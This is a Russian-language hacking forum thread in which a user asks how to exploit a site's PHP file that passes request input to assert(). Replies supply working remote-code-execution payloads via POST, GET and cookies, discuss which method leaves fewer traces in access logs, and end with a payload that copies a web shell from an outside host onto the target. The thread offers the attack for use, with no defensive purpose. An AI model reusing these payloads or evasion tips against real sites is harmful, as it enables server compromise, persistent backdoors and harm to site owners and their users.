Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   PHP assert (https://forum.antichat.xyz/showthread.php?t=440329)

marynli 25.04.2016 15:11
Допустим в php файле на сайте есть строка вида:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).

Как можно написать PHP скрипт чтобы использовать данную уязвимость ?

Какой код лучше заливать?

t0ma5 25.04.2016 15:17
Цитата:
Сообщение от marynli
marynli said:

Допустим в php файле на сайте есть строка вида:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).
Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
Какой код лучше заливать?
в параметр 123123123 пишешь пхп код, он выполняется

curl 'http://site.ru/' --data '123123123=phpinfo();'

strelok20094 25.04.2016 18:40
site.com/yourfile.php?123123123=phpinfo();

t0ma5 25.04.2016 18:49
Цитата:
Сообщение от strelok20094
strelok20094 said:

site.com/yourfile.php?123123123=phpinfo();
get палевно

strelok20094 25.04.2016 18:52
Цитата:
Сообщение от t0ma5
t0ma5 said:

get палевно
а пост беспалевно? вот тебе выдерка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44

t0ma5 25.04.2016 19:02
Цитата:
Сообщение от strelok20094
strelok20094 said:

а пост беспалевно? вот тебе выдерка из access log
xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44
вот тебе выдержка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44

сам ответь что беспалевней

t0ma5 25.04.2016 19:08
если уж на то пошло то я бы через куки слал

curl 'http://site.ru' -H 'Cookie: '123123123=phpinfo()'

marynli 29.04.2016 17:02
А как запихать туда веб шелл?

private_static 29.04.2016 17:14
Цитата:
Сообщение от marynli
marynli said:

А как запихать туда веб шелл?
Код:
Code:
site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php");
зальётся по пути site.com/shell.php


Время: 12:31